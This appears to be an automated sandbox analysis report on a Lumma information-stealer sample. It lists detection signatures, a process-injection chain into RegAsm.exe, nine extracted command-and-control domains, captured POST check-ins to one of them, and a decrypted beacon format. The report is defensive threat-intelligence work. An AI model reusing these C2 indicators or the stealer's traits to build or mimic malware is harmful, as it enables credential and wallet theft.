Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FoS5cjKhd3.exe

Overview

General Information

Sample name:FoS5cjKhd3.exe
renamed because original name is a hash value
Original sample name:3b2250172cdc65f249533ad138ef8ab5.exe
Analysis ID:1520608
MD5:3b2250172cdc65f249533ad138ef8ab5
SHA1:70d66ee841754f39e7abffeb8f980be3f1e50033
SHA256:1622822b3f7f66537240b4760560550654eb2c23c1f57c7e4bb52d3cbc5edd5e
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • FoS5cjKhd3.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\FoS5cjKhd3.exe" MD5: 3B2250172CDC65F249533AD138EF8AB5)
    • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["drawzhotdog.shop", "lootebarrkeyn.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "gutterydhowi.shop", "vozmeatillu.shop", "fragnantbui.shop"], "Build id": "FATE99--"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        3.2.RegAsm.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:47:13.162369+020020546531A Network Trojan was detected192.168.2.649711104.21.4.136443TCP
            2024-09-27T16:47:14.311281+020020546531A Network Trojan was detected192.168.2.649712104.21.4.136443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:47:13.162369+020020498361A Network Trojan was detected192.168.2.649711104.21.4.136443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:47:14.311281+020020498121A Network Trojan was detected192.168.2.649712104.21.4.136443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:47:12.707321+020020561651Domain Observed Used for C2 Detected192.168.2.649711104.21.4.136443TCP
            2024-09-27T16:47:13.840862+020020561651Domain Observed Used for C2 Detected192.168.2.649712104.21.4.136443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:47:12.136915+020020561641Domain Observed Used for C2 Detected192.168.2.6512461.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:47:12.119062+020020560481Domain Observed Used for C2 Detected192.168.2.6645031.1.1.153UDP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 3.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["drawzhotdog.shop", "lootebarrkeyn.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "gutterydhowi.shop", "vozmeatillu.shop", "fragnantbui.shop"], "Build id": "FATE99--"}
            Source: FoS5cjKhd3.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: reinforcenh.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: stogeneratmns.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fragnantbui.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: drawzhotdog.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: vozmeatillu.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: offensivedzvju.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ghostreedmnu.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: gutterydhowi.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lootebarrkeyn.shop
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: FATE99--
            Source: FoS5cjKhd3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: FoS5cjKhd3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: c:\rje\tg\ev8pv\obj\Release\ojc.pdb source: FoS5cjKhd3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax3_2_0040F042
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00412450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]3_2_00412450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]3_2_00412450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00412450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0040D470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h3_2_004404AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h3_2_00447AC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00447AC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]3_2_00447D38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh3_2_00447E1B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, esi3_2_00401000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_0044B010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00425030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]3_2_0040C1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h3_2_0044B1A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427230
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]3_2_004452E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_004142E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah3_2_0044B320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]3_2_00407450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_00442410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0044B430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_004314A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0044A510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_00435519
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_00433623
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh3_2_00449620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_00434629
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+01h], 00000000h3_2_0040F63A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h3_2_00414692
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000668h]3_2_0041E71A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h3_2_0041E71A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+01h], 00000000h3_2_0040F7E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+01h], 00000000h3_2_0040F807
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000001C8h]3_2_00432830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000198h]3_2_00432830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00432830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_00432830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_00432830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h3_2_004408E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]3_2_00444970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000884h]3_2_00429978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00434990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_00434990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00434990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_00420A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h3_2_00440A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]3_2_0040FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]3_2_0040FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0040FA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh3_2_0042CAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh3_2_0042CAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00421AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh3_2_00444BC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h3_2_0041AB90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh3_2_00448B90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00430CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]3_2_00405CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]3_2_00404CB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_00449D22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh3_2_00445DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]3_2_00448D80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]3_2_0042FE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]3_2_0042FE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebx, 02h3_2_00413EEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]3_2_00413EEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then dec ebx3_2_0043FE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00426FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [004521ECh]3_2_0041FFD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h3_2_0042DFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_0043BFF0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2056048 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop) : 192.168.2.6:64503 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:49712 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:49711 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.6:51246 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.4.136:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 104.21.4.136:443
            Source: Malware configuration extractorURLs: drawzhotdog.shop
            Source: Malware configuration extractorURLs: lootebarrkeyn.shop
            Source: Malware configuration extractorURLs: ghostreedmnu.shop
            Source: Malware configuration extractorURLs: offensivedzvju.shop
            Source: Malware configuration extractorURLs: reinforcenh.shop
            Source: Malware configuration extractorURLs: stogeneratmns.shop
            Source: Malware configuration extractorURLs: gutterydhowi.shop
            Source: Malware configuration extractorURLs: vozmeatillu.shop
            Source: Malware configuration extractorURLs: fragnantbui.shop
            Source: Joe Sandbox ViewIP Address: 104.21.4.136 104.21.4.136
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: gutterydhowi.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: lootebarrkeyn.shop
            Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
            Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
            Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/
            Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/api
            Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/apiC
            Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/apiM
            Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/acce
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00439BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00439BD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00439BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043A777 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_0043A777

            System Summary

            barindex
            Source: FoS5cjKhd3.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 365056
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeCode function: 1_2_02B60C401_2_02B60C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004404AB3_2_004404AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00447D383_2_00447D38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004010003_2_00401000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004480B03_2_004480B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004491203_2_00449120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C1C03_2_0040C1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D2503_2_0042D250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A2313_2_0040A231
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044A2303_2_0044A230
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004012C73_2_004012C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004452E03_2_004452E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004153523_2_00415352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004103A83_2_004103A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004074503_2_00407450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004054703_2_00405470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004094023_2_00409402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044A5103_2_0044A510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004115B03_2_004115B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D6103_2_0041D610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004496203_2_00449620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A6E03_2_0040A6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B6B03_2_0040B6B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043F7003_2_0043F700
